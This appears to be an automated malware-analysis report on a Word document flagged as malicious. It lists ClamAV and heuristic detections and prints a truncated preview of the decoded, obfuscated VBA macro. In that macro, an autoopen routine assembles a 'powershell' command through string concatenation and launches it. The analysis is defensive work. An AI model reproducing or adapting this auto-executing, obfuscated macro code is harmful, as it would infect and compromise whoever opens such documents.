MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros with an autoopen function, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for 'VBA WMI Win32_Process launcher' indicates that the macro attempts to create a new process using WMI, a strong indicator of malware attempting to download and execute a second-stage payload. The ClamAV detection further supports the malicious nature of the file.
Heuristics 8
-
ClamAV: Doc.Malware.Sagent-6889618-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6889618-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58726 bytes |
SHA-256: aaa7f23a2fac0cb940cf867c2da7f1bc75748fe7bcb1f014c7e5445abf8cae6e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mA4QAX4"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function sGAXQXD()
Set dACcoXA = mXwADxkA
If tCcAAxAk = WQZDAAD Then
TAxAQG = Sgn(327116844 - CByte(fUD1Do) * f1QCAD4c * 435585839)
GAAGGDox = ChrW(J_DBZZ)
HAA_Aw = Rnd(75602835 * 942738038)
rAAA_4 = Sin(SUUXZBQ - CStr(qADABwG))
End If
Set qxAUUAD1 = iDGUAU4
If CwAGAcA = TxAAABAA Then
zkkACoDA = CDate(167498659 - Fix(lAZADABA) * SGXA4AAD * 828112800)
vocACA = Oct(MUAAAABC)
E_kAc4 = ChrB(438182732 * 937518061)
zAXACBA = CSng(DkBAZAA - CByte(HAAcAoA))
End If
Set HAABDC = vxUAwADU
If tAA_DQ = QAQ4QDAo Then
ZAc4ABA = Tan(569048783 - CStr(tA44A_) * UGADUk4U * 976834984)
BAD_BX = CLng(NZAUZA)
NxXUAD = Chr(946994860 * 486573220)
VABcQ4 = Fix(SQQ4QUA - CByte(SACAAB))
End If
Set dB1AwGk = lAQkQxoC
If KXcGUXUc = RAAZAAA Then
WAxU4A = Round(395567894 - Tan(RUAQAAG) * vokBUGA * 448848976)
AAZAcCAA = ChrW(UAxABAAA)
ZBBUAxo4 = Sgn(24947587 * 349464730)
tAowBA = CDate(LZZAA4oA - Atn(fAo_XX))
End If
Set PCAwAwQ = LCAQCAUA
If ickAUw = rAB4AAk Then
iDQ_Q1U = Sqr(144930819 - CDate(OxBABABA) * jkcoGC * 659264390)
aAAUckA = CLng(HGUXA_AQ)
OQBDAAA_ = Sin(108099800 * 900317339)
hGQxUB1 = Log(sABZGAAC - Fix(GCBQAGcG))
End If
Set NCAoAAx = XBXUk4_
If jAQQQcZ = RBAoxXBA Then
FAxQwAD = CSng(979428763 - Sqr(bQAxw_) * ZAAUQDG4 * 226450137)
woZ4DwCG = Rnd(XUx1QXQ)
hQCCAB = Sgn(115728421 * 706221589)
F4kQAwwx = CInt(qAAwAA - Atn(FxAkwA))
End If
Set iAcB1k = CAQkAwxx
If kA44BAXG = IUDBoQQ Then
zcQXCDB4 = ChrW(269277034 - Round(jDUAAAGD) * hAQAAA * 357425621)
zGBAxA = Round(iZAACk)
EcCUAk_X = Fix(529037664 * 311130032)
GkQZGxQA = Atn(jUcocBZD - Chr(wwAAAwQ))
End If
Set PkZXAA1 = VAACAA
If FGAAAAC1 = UoCAAADA Then
f_1QD4Dx = CLng(575769778 - Atn(k1BBDw) * OBoAwAA * 88705447)
QoDZDA = Sin(aDw_CUQ)
dUwA4oAB = Hex(239178232 * 723170126)
hQZAcA = Round(LwwCUUoA - Chr(Jk4XAUU))
End If
End Function
Sub autoopen()
On Error Resume Next
Set uAxkAQ4 = TAxXUU
If sQUAAQX1 = s44DXoAA Then
zA_ADAA = Rnd(95102121 - Rnd(LDAoXZoA) * rAwAAx * 429494494)
H_CUAUC = CLng(uAADC_BQ)
uUcUGxAX = Oct(702468723 * 722370877)
YAAXQAG = CStr(NAk_ZD - Chr(nXCwUUCA))
End If
Set FDwGUDBC = hCxAAx
If JwA_Ao = cQDAXGB Then
KBxQ_BkA = Oct(118560081 - Log(SAAXBkB) * hAD1DQD * 576943770)
wDAAkA = ChrW(lAAAAUcA)
H_Akk1x1 = Int(229490353 * 714628329)
ZQUkX1w4 = Hex(wABAZA4A - Chr(mDAQCoCB))
End If
iQwUcAAU (hQwAoQQ + "po" + mA1DwQA + "wershel" + KAo1CQCk + C_c1AGx + kADkBABx + SQoBUAA + vDXBUQ + rDCAQQcA + pAADAADD + k1kGUAB + cAABQDw)
Set boXBXZAA = XkAXAG
If aAAwXAA = LAcD1xD Then
AGZAAAUA = Hex(631059502 - Tan(oGDBxo) * QU1X1DUw * 795093353)
GQ_QAQ = CBool(iGAB11QA)
FAAZ_A = Tan(257301751 * 729519990)
hCC4GZ = Sin(QAADDkA - Sin(HxoZ_BA))
End If
Set poBoXB = jUCkoGQQ
If zxA_AU_A = qwoAA_Q Then
BZADAA = Chr(214298625 - CInt(pAkAkD) * MAAAUAAo * 67837771)
aXUAAAo_ = Round(A1BGAA_)
FZ4XwXGB = CByte(621909134 * 355720925)
sAUXBUZ = CLng(LAwDwA - Oct(zo1AA1A))
End If
Set iAcxAA = VGDCkU
If XAoUZA = nAxxAAkA Then
QAXABk = Int(375700498 - Oct(mB_AwD) * KGwBAQkA * 414328963)
tDQkBoAA = CBool(RAAAQQ)
ZACBZA = CSng(582743379 * 906114347)
aDAAcQA = Rnd(XAUAXA - CInt(wXAAxBcA))
End If
End Sub
Function jAxZAAUk()
Set zQC1Ax_U = aXBA1A
If bBAAoCAU = wwc4wUA Then
z_AAGk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.